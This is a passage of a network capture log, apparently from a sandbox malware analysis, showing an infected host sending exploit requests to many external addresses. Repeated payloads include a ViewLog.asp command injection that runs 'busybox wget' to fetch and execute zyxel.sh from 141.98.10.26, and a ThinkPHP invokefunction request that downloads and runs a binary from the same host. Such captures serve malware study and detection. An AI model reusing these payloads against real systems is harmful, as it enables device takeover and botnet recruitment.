Nov 22, 2023 08:38:08.465347052 CET	2254	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:10.705040932 CET	2562	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:15.312411070 CET	3059	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:24.271219015 CET	4134	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:42.956500053 CET	6359	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:19.815347910 CET	10958	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.23	47194	94.120.49.14	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.801598072 CET	2093	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.23	33880	62.29.28.17	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.801677942 CET	2093	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.23	33232	94.120.253.66	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.804699898 CET	2094	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.23	50248	94.122.202.31	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.804770947 CET	2095	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.23	54106	206.2.175.196	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.979868889 CET	2097	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 38 3a 31 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:38:11Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.23	43372	95.216.6.100	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:07.240461111 CET	2110	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:07.436065912 CET	2135	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.23	54122	206.2.175.196	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:07.323575974 CET	2133	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 38 3a 31 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:38:12Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.23	52416	94.120.158.204	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:07.575144053 CET	2215	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.23	43418	94.120.164.214	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:07.575272083 CET	2215	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:11.728920937 CET	2626	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:17.872185946 CET	3404	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:29.902406931 CET	4842	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:55.242772102 CET	7946	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:44.388010025 CET	13934	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.23	48870	95.168.209.77	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:08.637756109 CET	2326	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:08.833520889 CET	2334	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:08 GMT Server: Apache/2.4.25 (Debian) X-Content-Type-Options: nosniff X-XSS-Protection: 1;mode=block Content-Length: 432 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 72 30 35 2e 76 61 73 2d 73 65 72 76 65 72 2e 63 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.25 (Debian) Server at tor05.vas-server.cz Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.23	39440	95.217.222.218	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:08.641947031 CET	2327	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:08.840780973 CET	2336	IN	HTTP/1.1 400 Bad Request Server: nginx/1.21.1 Date: Wed, 22 Nov 2023 07:38:08 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.23	44510	95.65.52.124	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:08.662601948 CET	2328	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:08.882424116 CET	2338	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 Content-Length: 140 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.23	43790	95.246.80.209	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:08.669109106 CET	2329	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.23	44286	95.164.252.135	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:08.738280058 CET	2330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:08.838849068 CET	2335	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.23	34720	95.100.190.29	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:08.863831997 CET	2337	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:09.064918995 CET	2341	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:08 GMT Date: Wed, 22 Nov 2023 07:38:08 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 64 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 30 36 33 38 36 38 38 26 23 34 36 3b 32 36 39 64 32 61 61 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.edd1f557.1700638688.269d2aaa</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.23	32904	31.200.111.70	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:09.043962955 CET	2340	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.23	39630	31.136.137.23	8080

Timestamp	kBytes transferred	Direction	Data
